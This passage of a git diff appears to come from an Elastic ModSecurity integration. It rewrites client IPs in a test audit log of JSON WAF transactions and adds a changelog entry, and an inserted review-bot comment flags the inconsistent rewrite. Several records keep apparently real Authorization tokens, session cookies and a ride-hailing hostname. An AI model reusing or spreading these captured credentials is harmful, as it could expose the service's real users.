)","reference":"o0,11v25,11","ruleId":"920350","file":"/etc/nginx/modsec/owasp-modsecurity-crs/rules/REQUEST-920-PROTOCOL-ENFORCEMENT.conf","lineNumber":"733","data":"34.87.56.16","severity":"4","ver":"OWASP_CRS/3.0.0","rev":"2","tags":["application-multi","language-multi","platform-multi","attack-protocol","OWASP_CRS/PROTOCOL_VIOLATION/IP_HOST","WASCTC/WASC-21","OWASP_TOP_10/A7","PCI/6.5.10"],"maturity":"9","accuracy":"9"}}]}} {"transaction":{"client_ip":"37.120.205.2","time_stamp":"Fri May 14 15:08:22 2021","server_id":"c06217c4ac0d6f8892d2489cd5d92aaceec2508e","client_port":55175,"host_ip":"37.120.205.2","host_port":443,"id":"162100490217.924032","request":{"method":"PUT","http_version":1.1,"uri":"/orders/2734183/finish","headers":{"Authorization":"365dcb63535abc1ecf5a98611a028f82389ad4a07678eea5a6260b12993f0906","Host":"www.owayride.com","Content-Type":"application/json; charset=UTF-8","Content-Length":"1010","Connection":"Keep-Alive","Accept-Encoding":"gzip","User-Agent":"okhttp/2.7.5"}},"response":{"http_code":400,"headers":{"Content-Encoding":"gzip","Connection":"keep-alive","X-Powered-By":"Phusion Passenger 6.0.2","Vary":"Accept-Encoding, Origin","X-XSS-Protection":"1; mode=block","X-Permitted-Cross-Domain-Policies":"none","Cache-Control":"no-cache","Strict-Transport-Security":"max-age=31536000; includeSubDomains","Status":"400 Bad Request","Content-Type":"application/json; charset=utf-8","Date":"Fri, 14 May 2021 15:08:23 GMT","Server":"nginx/1.14.0","X-Request-Id":"446039c0-0fcf-43f2-af46-6c8227c82f4e","X-Download-Options":"noopen","X-Runtime":"0.165052","X-Content-Type-Options":"nosniff","X-Frame-Options":"SAMEORIGIN","Via":"1.1 google"}},"producer":{"modsecurity":"ModSecurity v3.0.2 (Linux)","connector":"ModSecurity-nginx v0.1.1-beta","secrules_engine":"Enabled","components":["OWASP_CRS/3.0.2\""]},"messages":[]}} -{"transaction":{"client_ip":"162.62.123.46","time_stamp":"Fri May 14 15:11:52 
2021","server_id":"c06217c4ac0d6f8892d2489cd5d92aaceec2508e","client_port":40742,"host_ip":"162.62.123.46","host_port":443,"id":"162100511255.595254","request":{"method":"GET","http_version":1.1,"uri":"/","headers":{"Host":"34.87.56.16","Connection":"close"}},"response":{"http_code":200,"headers":{"Vary":"Accept-Encoding, Origin","X-XSS-Protection":"1; mode=block","Set-Cookie":"_pmcapi_session=c94b2c408d9b56b91e00877fb6c21fca; path=/; HttpOnly","X-Permitted-Cross-Domain-Policies":"none","Cache-Control":"max-age=0, private, must-revalidate","ETag":"W/\"dda3a9b33849ca9d88844c0331e9b98f\"","Strict-Transport-Security":"max-age=31536000; includeSubDomains","Status":"200 OK","Connection":"close","X-Powered-By":"Phusion Passenger 6.0.2","Content-Type":"text/html; charset=utf-8","Content-Length":"12475","Date":"Fri, 14 May 2021 15:11:52 GMT","Server":"nginx/1.14.0","X-Request-Id":"63b9e1d0-481f-43b5-9ca3-e1606c48c338","X-Download-Options":"noopen","X-Runtime":"0.028032","X-Content-Type-Options":"nosniff","X-Frame-Options":"SAMEORIGIN","Via":"1.1 google"}},"producer":{"modsecurity":"ModSecurity v3.0.2 (Linux)","connector":"ModSecurity-nginx v0.1.1-beta","secrules_engine":"Enabled","components":["OWASP_CRS/3.0.2\""]},"messages":[{"message":"Host header is a numeric IP address","details":{"match":"Matched \"Operator `Rx' with parameter `^[\\d.:]+$' against variable `REQUEST_HEADERS:Host' (Value: `34.87.56.16' )","reference":"o0,11v21,11","ruleId":"920350","file":"/etc/nginx/modsec/owasp-modsecurity-crs/rules/REQUEST-920-PROTOCOL-ENFORCEMENT.conf","lineNumber":"733","data":"34.87.56.16","severity":"4","ver":"OWASP_CRS/3.0.0","rev":"2","tags":["application-multi","language-multi","platform-multi","attack-protocol","OWASP_CRS/PROTOCOL_VIOLATION/IP_HOST","WASCTC/WASC-21","OWASP_TOP_10/A7","PCI/6.5.10"],"maturity":"9","accuracy":"9"}}]}} -{"transaction":{"client_ip":"162.62.123.46","time_stamp":"Fri May 14 15:12:01 
2021","server_id":"c06217c4ac0d6f8892d2489cd5d92aaceec2508e","client_port":44460,"host_ip":"162.62.123.46","host_port":443,"id":"162100512158.550855","request":{"method":"GET","http_version":1.1,"uri":"/","headers":{"Host":"34.87.56.16","Connection":"close"}},"response":{"http_code":200,"headers":{"Vary":"Accept-Encoding, Origin","X-XSS-Protection":"1; mode=block","Set-Cookie":"_pmcapi_session=db4a0ad600d22d8015c49062844b3ac9; path=/; HttpOnly","X-Permitted-Cross-Domain-Policies":"none","Cache-Control":"max-age=0, private, must-revalidate","ETag":"W/\"4b55096b2de9c691c0e0f67a496dc7d9\"","Strict-Transport-Security":"max-age=31536000; includeSubDomains","Status":"200 OK","Connection":"close","X-Powered-By":"Phusion Passenger 6.0.2","Content-Type":"text/html; charset=utf-8","Content-Length":"12475","Date":"Fri, 14 May 2021 15:12:01 GMT","Server":"nginx/1.14.0","X-Request-Id":"b7220068-a82e-4535-be4c-a087fe3901ed","X-Download-Options":"noopen","X-Runtime":"0.029745","X-Content-Type-Options":"nosniff","X-Frame-Options":"SAMEORIGIN","Via":"1.1 google"}},"producer":{"modsecurity":"ModSecurity v3.0.2 (Linux)","connector":"ModSecurity-nginx v0.1.1-beta","secrules_engine":"Enabled","components":["OWASP_CRS/3.0.2\""]},"messages":[{"message":"Host header is a numeric IP address","details":{"match":"Matched \"Operator `Rx' with parameter `^[\\d.:]+$' against variable `REQUEST_HEADERS:Host' (Value: `34.87.56.16' )","reference":"o0,11v21,11","ruleId":"920350","file":"/etc/nginx/modsec/owasp-modsecurity-crs/rules/REQUEST-920-PROTOCOL-ENFORCEMENT.conf","lineNumber":"733","data":"34.87.56.16","severity":"4","ver":"OWASP_CRS/3.0.0","rev":"2","tags":["application-multi","language-multi","platform-multi","attack-protocol","OWASP_CRS/PROTOCOL_VIOLATION/IP_HOST","WASCTC/WASC-21","OWASP_TOP_10/A7","PCI/6.5.10"],"maturity":"9","accuracy":"9"}}]}} -{"transaction":{"client_ip":"162.62.123.46","time_stamp":"Fri May 14 15:12:18 
2021","server_id":"c06217c4ac0d6f8892d2489cd5d92aaceec2508e","client_port":45952,"host_ip":"162.62.123.46","host_port":443,"id":"162100513893.802359","request":{"method":"GET","http_version":1.0,"uri":"/","headers":{"Host":"34.87.56.16","Connection":"close"}},"response":{"http_code":200,"headers":{"Vary":"Accept-Encoding, Origin","X-XSS-Protection":"1; mode=block","Set-Cookie":"_pmcapi_session=e1e011a4d0188a1453cc4b8b9f3e476c; path=/; HttpOnly","X-Permitted-Cross-Domain-Policies":"none","Cache-Control":"max-age=0, private, must-revalidate","ETag":"W/\"f7e5c631964147f2a3458c4f97647883\"","Strict-Transport-Security":"max-age=31536000; includeSubDomains","Status":"200 OK","Connection":"close","X-Powered-By":"Phusion Passenger 6.0.2","Content-Type":"text/html; charset=utf-8","Content-Length":"12475","Date":"Fri, 14 May 2021 15:12:18 GMT","Server":"nginx/1.14.0","X-Request-Id":"15fa3f35-b204-4b2a-bbd8-7aec1d8e4417","X-Download-Options":"noopen","X-Runtime":"0.026203","X-Content-Type-Options":"nosniff","X-Frame-Options":"SAMEORIGIN","Via":"1.1 google"}},"producer":{"modsecurity":"ModSecurity v3.0.2 (Linux)","connector":"ModSecurity-nginx v0.1.1-beta","secrules_engine":"Enabled","components":["OWASP_CRS/3.0.2\""]},"messages":[{"message":"Host header is a numeric IP address","details":{"match":"Matched \"Operator `Rx' with parameter `^[\\d.:]+$' against variable `REQUEST_HEADERS:Host' (Value: `34.87.56.16' )","reference":"o0,11v21,11","ruleId":"920350","file":"/etc/nginx/modsec/owasp-modsecurity-crs/rules/REQUEST-920-PROTOCOL-ENFORCEMENT.conf","lineNumber":"733","data":"34.87.56.16","severity":"4","ver":"OWASP_CRS/3.0.0","rev":"2","tags":["application-multi","language-multi","platform-multi","attack-protocol","OWASP_CRS/PROTOCOL_VIOLATION/IP_HOST","WASCTC/WASC-21","OWASP_TOP_10/A7","PCI/6.5.10"],"maturity":"9","accuracy":"9"}}]}} +{"transaction":{"client_ip":"67.43.156.15","time_stamp":"Fri May 14 15:11:52 
2021","server_id":"c06217c4ac0d6f8892d2489cd5d92aaceec2508e","client_port":40742,"host_ip":"67.43.156.15","host_port":443,"id":"162100511255.595254","request":{"method":"GET","http_version":1.1,"uri":"/","headers":{"Host":"34.87.56.16","Connection":"close"}},"response":{"http_code":200,"headers":{"Vary":"Accept-Encoding, Origin","X-XSS-Protection":"1; mode=block","Set-Cookie":"_pmcapi_session=c94b2c408d9b56b91e00877fb6c21fca; path=/; HttpOnly","X-Permitted-Cross-Domain-Policies":"none","Cache-Control":"max-age=0, private, must-revalidate","ETag":"W/\"dda3a9b33849ca9d88844c0331e9b98f\"","Strict-Transport-Security":"max-age=31536000; includeSubDomains","Status":"200 OK","Connection":"close","X-Powered-By":"Phusion Passenger 6.0.2","Content-Type":"text/html; charset=utf-8","Content-Length":"12475","Date":"Fri, 14 May 2021 15:11:52 GMT","Server":"nginx/1.14.0","X-Request-Id":"63b9e1d0-481f-43b5-9ca3-e1606c48c338","X-Download-Options":"noopen","X-Runtime":"0.028032","X-Content-Type-Options":"nosniff","X-Frame-Options":"SAMEORIGIN","Via":"1.1 google"}},"producer":{"modsecurity":"ModSecurity v3.0.2 (Linux)","connector":"ModSecurity-nginx v0.1.1-beta","secrules_engine":"Enabled","components":["OWASP_CRS/3.0.2\""]},"messages":[{"message":"Host header is a numeric IP address","details":{"match":"Matched \"Operator `Rx' with parameter `^[\\d.:]+$' against variable `REQUEST_HEADERS:Host' (Value: `34.87.56.16' )","reference":"o0,11v21,11","ruleId":"920350","file":"/etc/nginx/modsec/owasp-modsecurity-crs/rules/REQUEST-920-PROTOCOL-ENFORCEMENT.conf","lineNumber":"733","data":"34.87.56.16","severity":"4","ver":"OWASP_CRS/3.0.0","rev":"2","tags":["application-multi","language-multi","platform-multi","attack-protocol","OWASP_CRS/PROTOCOL_VIOLATION/IP_HOST","WASCTC/WASC-21","OWASP_TOP_10/A7","PCI/6.5.10"],"maturity":"9","accuracy":"9"}}]}} +{"transaction":{"client_ip":"67.43.156.15","time_stamp":"Fri May 14 15:12:01 
2021","server_id":"c06217c4ac0d6f8892d2489cd5d92aaceec2508e","client_port":44460,"host_ip":"67.43.156.15","host_port":443,"id":"162100512158.550855","request":{"method":"GET","http_version":1.1,"uri":"/","headers":{"Host":"34.87.56.16","Connection":"close"}},"response":{"http_code":200,"headers":{"Vary":"Accept-Encoding, Origin","X-XSS-Protection":"1; mode=block","Set-Cookie":"_pmcapi_session=db4a0ad600d22d8015c49062844b3ac9; path=/; HttpOnly","X-Permitted-Cross-Domain-Policies":"none","Cache-Control":"max-age=0, private, must-revalidate","ETag":"W/\"4b55096b2de9c691c0e0f67a496dc7d9\"","Strict-Transport-Security":"max-age=31536000; includeSubDomains","Status":"200 OK","Connection":"close","X-Powered-By":"Phusion Passenger 6.0.2","Content-Type":"text/html; charset=utf-8","Content-Length":"12475","Date":"Fri, 14 May 2021 15:12:01 GMT","Server":"nginx/1.14.0","X-Request-Id":"b7220068-a82e-4535-be4c-a087fe3901ed","X-Download-Options":"noopen","X-Runtime":"0.029745","X-Content-Type-Options":"nosniff","X-Frame-Options":"SAMEORIGIN","Via":"1.1 google"}},"producer":{"modsecurity":"ModSecurity v3.0.2 (Linux)","connector":"ModSecurity-nginx v0.1.1-beta","secrules_engine":"Enabled","components":["OWASP_CRS/3.0.2\""]},"messages":[{"message":"Host header is a numeric IP address","details":{"match":"Matched \"Operator `Rx' with parameter `^[\\d.:]+$' against variable `REQUEST_HEADERS:Host' (Value: `34.87.56.16' )","reference":"o0,11v21,11","ruleId":"920350","file":"/etc/nginx/modsec/owasp-modsecurity-crs/rules/REQUEST-920-PROTOCOL-ENFORCEMENT.conf","lineNumber":"733","data":"34.87.56.16","severity":"4","ver":"OWASP_CRS/3.0.0","rev":"2","tags":["application-multi","language-multi","platform-multi","attack-protocol","OWASP_CRS/PROTOCOL_VIOLATION/IP_HOST","WASCTC/WASC-21","OWASP_TOP_10/A7","PCI/6.5.10"],"maturity":"9","accuracy":"9"}}]}} +{"transaction":{"client_ip":"67.43.156.15","time_stamp":"Fri May 14 15:12:18 
2021","server_id":"c06217c4ac0d6f8892d2489cd5d92aaceec2508e","client_port":45952,"host_ip":"67.43.156.15","host_port":443,"id":"162100513893.802359","request":{"method":"GET","http_version":1.0,"uri":"/","headers":{"Host":"34.87.56.16","Connection":"close"}},"response":{"http_code":200,"headers":{"Vary":"Accept-Encoding, Origin","X-XSS-Protection":"1; mode=block","Set-Cookie":"_pmcapi_session=e1e011a4d0188a1453cc4b8b9f3e476c; path=/; HttpOnly","X-Permitted-Cross-Domain-Policies":"none","Cache-Control":"max-age=0, private, must-revalidate","ETag":"W/\"f7e5c631964147f2a3458c4f97647883\"","Strict-Transport-Security":"max-age=31536000; includeSubDomains","Status":"200 OK","Connection":"close","X-Powered-By":"Phusion Passenger 6.0.2","Content-Type":"text/html; charset=utf-8","Content-Length":"12475","Date":"Fri, 14 May 2021 15:12:18 GMT","Server":"nginx/1.14.0","X-Request-Id":"15fa3f35-b204-4b2a-bbd8-7aec1d8e4417","X-Download-Options":"noopen","X-Runtime":"0.026203","X-Content-Type-Options":"nosniff","X-Frame-Options":"SAMEORIGIN","Via":"1.1 google"}},"producer":{"modsecurity":"ModSecurity v3.0.2 (Linux)","connector":"ModSecurity-nginx v0.1.1-beta","secrules_engine":"Enabled","components":["OWASP_CRS/3.0.2\""]},"messages":[{"message":"Host header is a numeric IP address","details":{"match":"Matched \"Operator `Rx' with parameter `^[\\d.:]+$' against variable `REQUEST_HEADERS:Host' (Value: `34.87.56.16' )","reference":"o0,11v21,11","ruleId":"920350","file":"/etc/nginx/modsec/owasp-modsecurity-crs/rules/REQUEST-920-PROTOCOL-ENFORCEMENT.conf","lineNumber":"733","data":"34.87.56.16","severity":"4","ver":"OWASP_CRS/3.0.0","rev":"2","tags":["application-multi","language-multi","platform-multi","attack-protocol","OWASP_CRS/PROTOCOL_VIOLATION/IP_HOST","WASCTC/WASC-21","OWASP_TOP_10/A7","PCI/6.5.10"],"maturity":"9","accuracy":"9"}}]}} {"transaction":{"client_ip":"37.120.205.2","time_stamp":"Fri May 14 15:16:44 
2021","server_id":"c06217c4ac0d6f8892d2489cd5d92aaceec2508e","client_port":59740,"host_ip":"37.120.205.2","host_port":443,"id":"162100540477.608948","request":{"method":"PUT","http_version":1.1,"uri":"/orders/2734183/finish","headers":{"Authorization":"365dcb63535abc1ecf5a98611a028f82389ad4a07678eea5a6260b12993f0906","Host":"www.owayride.com","Content-Type":"application/json; charset=UTF-8","Content-Length":"1010","Connection":"Keep-Alive","Accept-Encoding":"gzip","User-Agent":"okhttp/2.7.5"}},"response":{"http_code":400,"headers":{"Content-Encoding":"gzip","Connection":"keep-alive","X-Powered-By":"Phusion Passenger 6.0.2","Vary":"Accept-Encoding, Origin","X-XSS-Protection":"1; mode=block","X-Permitted-Cross-Domain-Policies":"none","Cache-Control":"no-cache","Strict-Transport-Security":"max-age=31536000; includeSubDomains","Status":"400 Bad Request","Content-Type":"application/json; charset=utf-8","Date":"Fri, 14 May 2021 15:16:44 GMT","Server":"nginx/1.14.0","X-Request-Id":"173bac1d-4ac8-4e6c-8fba-1f15a5b9e5f6","X-Download-Options":"noopen","X-Runtime":"0.108246","X-Content-Type-Options":"nosniff","X-Frame-Options":"SAMEORIGIN","Via":"1.1 google"}},"producer":{"modsecurity":"ModSecurity v3.0.2 (Linux)","connector":"ModSecurity-nginx v0.1.1-beta","secrules_engine":"Enabled","components":["OWASP_CRS/3.0.2\""]},"messages":[]}} {"transaction":{"client_ip":"5.8.26.201","time_stamp":"Fri May 14 15:31:08 2021","server_id":"c06217c4ac0d6f8892d2489cd5d92aaceec2508e","client_port":52299,"host_ip":"5.8.26.201","host_port":443,"id":"162100626860.990852","request":{"method":"GET","http_version":1.1,"uri":"/customers/properties?trip_id=0","headers":{"Host":"www.owayride.com","Authorization":"2d47f33d04f8934c35cdd40e09257928aeea4995dd2c31167a265fac0fb5da21","Content-Type":"application/json","Connection":"keep-alive","Accept":"*/*","User-Agent":"Oway Ride/7.0.27 (com.owaycabs.passenger; build:200116; iOS 14.5.1) Alamofire/4.9.0","Accept-Language":"en-MM;q=1.0, 
my-MM;q=0.9","Accept-Encoding":"gzip;q=1.0, compress;q=0.5"}},"response":{"http_code":500,"headers":{"X-Runtime":"2.495058","X-Powered-By":"Phusion Passenger 6.0.2","Connection":"keep-alive","Vary":"Origin","Status":"500 Internal Server Error","X-Request-Id":"3e75f502-36bc-43f5-a827-0a4724952696","Server":"nginx/1.14.0","Content-Type":"text/html; charset=utf-8","Content-Length":"1477","Date":"Fri, 14 May 2021 15:31:11 GMT","Strict-Transport-Security":"max-age=31536000; includeSubDomains","Via":"1.1 google"}},"producer":{"modsecurity":"ModSecurity v3.0.2 (Linux)","connector":"ModSecurity-nginx v0.1.1-beta","secrules_engine":"Enabled","components":["OWASP_CRS/3.0.2\""]},"messages":[]}} {"transaction":{"client_ip":"210.14.100.32","time_stamp":"Fri May 14 15:36:40 2021","server_id":"c06217c4ac0d6f8892d2489cd5d92aaceec2508e","client_port":27070,"host_ip":"210.14.100.32","host_port":443,"id":"162100660087.362558","request":{"method":"PUT","http_version":1.1,"uri":"/orders/2762450/finish","headers":{"Authorization":"694293942460dee77c1a7d11c01adc3ba66b0b44b3ae7dab5f79a422a5e464ba","Host":"www.owayride.com","Content-Type":"application/json; charset=UTF-8","Content-Length":"1074","Connection":"Keep-Alive","Accept-Encoding":"gzip","User-Agent":"okhttp/2.7.5"}},"response":{"http_code":400,"headers":{"Content-Encoding":"gzip","Connection":"keep-alive","X-Powered-By":"Phusion Passenger 6.0.2","Vary":"Accept-Encoding, Origin","X-XSS-Protection":"1; mode=block","X-Permitted-Cross-Domain-Policies":"none","Cache-Control":"no-cache","Strict-Transport-Security":"max-age=31536000; includeSubDomains","Status":"400 Bad Request","Content-Type":"application/json; charset=utf-8","Date":"Fri, 14 May 2021 15:36:40 GMT","Server":"nginx/1.14.0","X-Request-Id":"142c0213-df87-4237-9215-451e580c9731","X-Download-Options":"noopen","X-Runtime":"0.177242","X-Content-Type-Options":"nosniff","X-Frame-Options":"SAMEORIGIN","Via":"1.1 google"}},"producer":{"modsecurity":"ModSecurity v3.0.2 
(Linux)","connector":"ModSecurity-nginx v0.1.1-beta","secrules_engine":"Enabled","components":["OWASP_CRS/3.0.2\""]},"messages":[]}}
diff --git a/packages/modsecurity/changelog.yml b/packages/modsecurity/changelog.yml
index f29ae026917..96051cf9a71 100644
--- a/packages/modsecurity/changelog.yml
+++ b/packages/modsecurity/changelog.yml
@@ -1,4 +1,9 @@
 # newer versions go on top
+- version: "0.1.2"
+ changes:
+ - description: Change test public IPs to the supported subset
+ type: bugfix
+ link: https://github.com/elastic/integrations/pull/2327
 - version: "0.1.1"
 changes:
 - description: Fix logic that checks for the 'forwarded' tag
diff --git a/packages/modsecurity/data_stream/auditlog/_dev/test/pipeline/test-audit.log b/packages/modsecurity/data_stream/auditlog/_dev/test/pipeline/test-audit.log
index f8fa8be960e..c7c26b78875 100644
--- a/packages/modsecurity/data_stream/auditlog/_dev/test/pipeline/test-audit.log
+++ b/packages/modsecurity/data_stream/auditlog/_dev/test/pipeline/test-audit.log
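Review bot: Only two client addresses in this sample are moved into the supported subset (`176.58.101.217` → `67.43.156.14`, `162.62.123.46` → `67.43.156.15`), while the untouched context records in the same hunk still carry `51.81.186.254`, `210.14.100.32`, `128.14.80.81`, `37.120.205.2` and `5.8.26.201` as `client_ip`/`host_ip`, plus `34.87.56.16` in the Host header. If the auditlog pipeline geo-enriches `client_ip`, those records will be enriched differently from the rewritten ones during the system test, which is presumably the inconsistency the changelog entry sets out to remove; the Host value is tied to the rule 920350 match text (`"data":"34.87.56.16"`), so it would need to change in both places together. Separately, both the retained and the added records keep what look like real captured values — the `Authorization` header hashes, the `_pmcapi_session` Set-Cookie values and the `www.owayride.com` hostname — and sample data shipped with the package is better served by clearly synthetic placeholders, e.g. `"Authorization":"<redacted-token>"`.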
@@ -1,4 +1,4 @@ -{"transaction":{"client_ip":"176.58.101.217","time_stamp":"Fri May 14 14:52:47 2021","server_id":"c06217c4ac0d6f8892d2489cd5d92aaceec2508e","client_port":44464,"host_ip":"176.58.101.217","host_port":443,"id":"162100396753.595789","request":{"method":"GET","http_version":1.1,"uri":"/owa/","headers":{"Host":"34.87.56.16","User-Agent":"Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/60.0.3112.113 Safari/537.36","Accept":"*/*","Accept-Encoding":"gzip"}},"response":{"http_code":404,"headers":{"Strict-Transport-Security":"max-age=31536000; includeSubDomains","X-Runtime":"0.003894","X-Powered-By":"Phusion Passenger 6.0.2","Connection":"keep-alive","Content-Encoding":"gzip","Vary":"Origin","Status":"404 Not Found","X-Request-Id":"435c78d3-c122-4dee-8ca5-101397fab368","Server":"nginx/1.14.0","Content-Type":"text/html; charset=utf-8","Date":"Fri, 14 May 2021 14:52:47 GMT","Via":"1.1 google"}},"producer":{"modsecurity":"ModSecurity v3.0.2 (Linux)","connector":"ModSecurity-nginx v0.1.1-beta","secrules_engine":"Enabled","components":["OWASP_CRS/3.0.2\""]},"messages":[{"message":"Host header is a numeric IP address","details":{"match":"Matched \"Operator `Rx' with parameter `^[\\d.:]+$' against variable `REQUEST_HEADERS:Host' (Value: `34.87.56.16' )","reference":"o0,11v25,11","ruleId":"920350","file":"/etc/nginx/modsec/owasp-modsecurity-crs/rules/REQUEST-920-PROTOCOL-ENFORCEMENT.conf","lineNumber":"733","data":"34.87.56.16","severity":"4","ver":"OWASP_CRS/3.0.0","rev":"2","tags":["application-multi","language-multi","platform-multi","attack-protocol","OWASP_CRS/PROTOCOL_VIOLATION/IP_HOST","WASCTC/WASC-21","OWASP_TOP_10/A7","PCI/6.5.10"],"maturity":"9","accuracy":"9"}}]}} -{"transaction":{"client_ip":"162.62.123.46","time_stamp":"Fri May 14 15:11:52 
2021","server_id":"c06217c4ac0d6f8892d2489cd5d92aaceec2508e","client_port":40742,"host_ip":"162.62.123.46","host_port":443,"id":"162100511255.595254","request":{"method":"GET","http_version":1.1,"uri":"/","headers":{"Host":"34.87.56.16","Connection":"close"}},"response":{"http_code":200,"headers":{"Vary":"Accept-Encoding, Origin","X-XSS-Protection":"1; mode=block","Set-Cookie":"_pmcapi_session=c94b2c408d9b56b91e00877fb6c21fca; path=/; HttpOnly","X-Permitted-Cross-Domain-Policies":"none","Cache-Control":"max-age=0, private, must-revalidate","ETag":"W/\"dda3a9b33849ca9d88844c0331e9b98f\"","Strict-Transport-Security":"max-age=31536000; includeSubDomains","Status":"200 OK","Connection":"close","X-Powered-By":"Phusion Passenger 6.0.2","Content-Type":"text/html; charset=utf-8","Content-Length":"12475","Date":"Fri, 14 May 2021 15:11:52 GMT","Server":"nginx/1.14.0","X-Request-Id":"63b9e1d0-481f-43b5-9ca3-e1606c48c338","X-Download-Options":"noopen","X-Runtime":"0.028032","X-Content-Type-Options":"nosniff","X-Frame-Options":"SAMEORIGIN","Via":"1.1 google"}},"producer":{"modsecurity":"ModSecurity v3.0.2 (Linux)","connector":"ModSecurity-nginx v0.1.1-beta","secrules_engine":"Enabled","components":["OWASP_CRS/3.0.2\""]},"messages":[{"message":"Host header is a numeric IP address","details":{"match":"Matched \"Operator `Rx' with parameter `^[\\d.:]+$' against variable `REQUEST_HEADERS:Host' (Value: `34.87.56.16' )","reference":"o0,11v21,11","ruleId":"920350","file":"/etc/nginx/modsec/owasp-modsecurity-crs/rules/REQUEST-920-PROTOCOL-ENFORCEMENT.conf","lineNumber":"733","data":"34.87.56.16","severity":"4","ver":"OWASP_CRS/3.0.0","rev":"2","tags":["application-multi","language-multi","platform-multi","attack-protocol","OWASP_CRS/PROTOCOL_VIOLATION/IP_HOST","WASCTC/WASC-21","OWASP_TOP_10/A7","PCI/6.5.10"],"maturity":"9","accuracy":"9"}}]}} -{"transaction":{"client_ip":"162.62.123.46","time_stamp":"Fri May 14 15:12:01 
2021","server_id":"c06217c4ac0d6f8892d2489cd5d92aaceec2508e","client_port":44460,"host_ip":"162.62.123.46","host_port":443,"id":"162100512158.550855","request":{"method":"GET","http_version":1.1,"uri":"/","headers":{"Host":"34.87.56.16","Connection":"close"}},"response":{"http_code":200,"headers":{"Vary":"Accept-Encoding, Origin","X-XSS-Protection":"1; mode=block","Set-Cookie":"_pmcapi_session=db4a0ad600d22d8015c49062844b3ac9; path=/; HttpOnly","X-Permitted-Cross-Domain-Policies":"none","Cache-Control":"max-age=0, private, must-revalidate","ETag":"W/\"4b55096b2de9c691c0e0f67a496dc7d9\"","Strict-Transport-Security":"max-age=31536000; includeSubDomains","Status":"200 OK","Connection":"close","X-Powered-By":"Phusion Passenger 6.0.2","Content-Type":"text/html; charset=utf-8","Content-Length":"12475","Date":"Fri, 14 May 2021 15:12:01 GMT","Server":"nginx/1.14.0","X-Request-Id":"b7220068-a82e-4535-be4c-a087fe3901ed","X-Download-Options":"noopen","X-Runtime":"0.029745","X-Content-Type-Options":"nosniff","X-Frame-Options":"SAMEORIGIN","Via":"1.1 google"}},"producer":{"modsecurity":"ModSecurity v3.0.2 (Linux)","connector":"ModSecurity-nginx v0.1.1-beta","secrules_engine":"Enabled","components":["OWASP_CRS/3.0.2\""]},"messages":[{"message":"Host header is a numeric IP address","details":{"match":"Matched \"Operator `Rx' with parameter `^[\\d.:]+$' against variable `REQUEST_HEADERS:Host' (Value: `34.87.56.16' )","reference":"o0,11v21,11","ruleId":"920350","file":"/etc/nginx/modsec/owasp-modsecurity-crs/rules/REQUEST-920-PROTOCOL-ENFORCEMENT.conf","lineNumber":"733","data":"34.87.56.16","severity":"4","ver":"OWASP_CRS/3.0.0","rev":"2","tags":["application-multi","language-multi","platform-multi","attack-protocol","OWASP_CRS/PROTOCOL_VIOLATION/IP_HOST","WASCTC/WASC-21","OWASP_TOP_10/A7","PCI/6.5.10"],"maturity":"9","accuracy":"9"}}]}} -{"transaction":{"client_ip":"162.62.123.46","time_stamp":"Fri May 14 15:12:18 
2021","server_id":"c06217c4ac0d6f8892d2489cd5d92aaceec2508e","client_port":45952,"host_ip":"162.62.123.46","host_port":443,"id":"162100513893.802359","request":{"method":"GET","http_version":1.0,"uri":"/","headers":{"Host":"34.87.56.16","Connection":"close"}},"response":{"http_code":200,"headers":{"Vary":"Accept-Encoding, Origin","X-XSS-Protection":"1; mode=block","Set-Cookie":"_pmcapi_session=e1e011a4d0188a1453cc4b8b9f3e476c; path=/; HttpOnly","X-Permitted-Cross-Domain-Policies":"none","Cache-Control":"max-age=0, private, must-revalidate","ETag":"W/\"f7e5c631964147f2a3458c4f97647883\"","Strict-Transport-Security":"max-age=31536000; includeSubDomains","Status":"200 OK","Connection":"close","X-Powered-By":"Phusion Passenger 6.0.2","Content-Type":"text/html; charset=utf-8","Content-Length":"12475","Date":"Fri, 14 May 2021 15:12:18 GMT","Server":"nginx/1.14.0","X-Request-Id":"15fa3f35-b204-4b2a-bbd8-7aec1d8e4417","X-Download-Options":"noopen","X-Runtime":"0.026203","X-Content-Type-Options":"nosniff","X-Frame-Options":"SAMEORIGIN","Via":"1.1 google"}},"producer":{"modsecurity":"ModSecurity v3.0.2 (Linux)","connector":"ModSecurity-nginx v0.1.1-beta","secrules_engine":"Enabled","components":["OWASP_CRS/3.0.2\""]},"messages":[{"message":"Host header is a numeric IP address","details":{"match":"Matched \"Operator `Rx' with parameter `^[\\d.:]+$' against variable `REQUEST_HEADERS:Host' (Value: `34.87.56.16' )","reference":"o0,11v21,11","ruleId":"920350","file":"/etc/nginx/modsec/owasp-modsecurity-crs/rules/REQUEST-920-PROTOCOL-ENFORCEMENT.conf","lineNumber":"733","data":"34.87.56.16","severity":"4","ver":"OWASP_CRS/3.0.0","rev":"2","tags":["application-multi","language-multi","platform-multi","attack-protocol","OWASP_CRS/PROTOCOL_VIOLATION/IP_HOST","WASCTC/WASC-21","OWASP_TOP_10/A7","PCI/6.5.10"],"maturity":"9","accuracy":"9"}}]}} +{"transaction":{"client_ip":"67.43.156.14","time_stamp":"Fri May 14 14:52:47 
2021","server_id":"c06217c4ac0d6f8892d2489cd5d92aaceec2508e","client_port":44464,"host_ip":"67.43.156.14","host_port":443,"id":"162100396753.595789","request":{"method":"GET","http_version":1.1,"uri":"/owa/","headers":{"Host":"34.87.56.16","User-Agent":"Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/60.0.3112.113 Safari/537.36","Accept":"*/*","Accept-Encoding":"gzip"}},"response":{"http_code":404,"headers":{"Strict-Transport-Security":"max-age=31536000; includeSubDomains","X-Runtime":"0.003894","X-Powered-By":"Phusion Passenger 6.0.2","Connection":"keep-alive","Content-Encoding":"gzip","Vary":"Origin","Status":"404 Not Found","X-Request-Id":"435c78d3-c122-4dee-8ca5-101397fab368","Server":"nginx/1.14.0","Content-Type":"text/html; charset=utf-8","Date":"Fri, 14 May 2021 14:52:47 GMT","Via":"1.1 google"}},"producer":{"modsecurity":"ModSecurity v3.0.2 (Linux)","connector":"ModSecurity-nginx v0.1.1-beta","secrules_engine":"Enabled","components":["OWASP_CRS/3.0.2\""]},"messages":[{"message":"Host header is a numeric IP address","details":{"match":"Matched \"Operator `Rx' with parameter `^[\\d.:]+$' against variable `REQUEST_HEADERS:Host' (Value: `34.87.56.16' 